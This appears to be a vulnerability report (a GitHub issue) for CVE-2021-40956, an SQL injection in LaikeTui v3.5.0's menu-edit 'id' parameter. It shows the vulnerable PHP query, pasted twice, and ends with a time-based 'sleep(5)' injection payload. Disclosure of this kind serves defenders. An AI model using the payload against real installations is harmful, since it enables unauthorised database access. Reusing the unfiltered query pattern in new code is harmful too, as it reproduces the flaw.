Headline
CVE-2021-40956: SQL injection exists in the LaiKetui menu management function · Issue #13 · bettershop/LaikeTui
LaiKetui v3.5.0 has SQL injection in the background through the menu management function, and sensitive data can be obtained.
The link where SQL injection exists is http://127.0.0.1/LaiKe/app/LKT/index.php?module=menu&action=modify&id=1
Locate the vulnerable file /app/LKT/webapp/modules/menu/actions/modifyAction.class.php
Because the parameter id is not filtered, it leads to SQL injection vulnerabilities
public function getDefaultView() {
$db = DBAction::getInstance();
$request = $this->getContext()->getRequest();
// 接收信息
$id = $request->getParameter("id");
$_SESSION['url'] = $_SERVER['HTTP_REFERER'];
// 根据id,查询菜单
$sql = "select * from lkt_core_menu where id = '$id'";
$r_1 = $db->select($sql);
public function getDefaultView() {
$db = DBAction::getInstance();
$request = $this->getContext()->getRequest();
// 接收信息
$id = $request->getParameter("id");
$_SESSION['url'] = $_SERVER['HTTP_REFERER'];
// 根据id,查询菜单
$sql = "select * from lkt_core_menu where id = '$id'";
$r_1 = $db->select($sql);
Use burpsuite to request url http://ceshi.io/laike/app/LKT/index.php?module=menu&action=modify&id=1’ and sleep(5)–+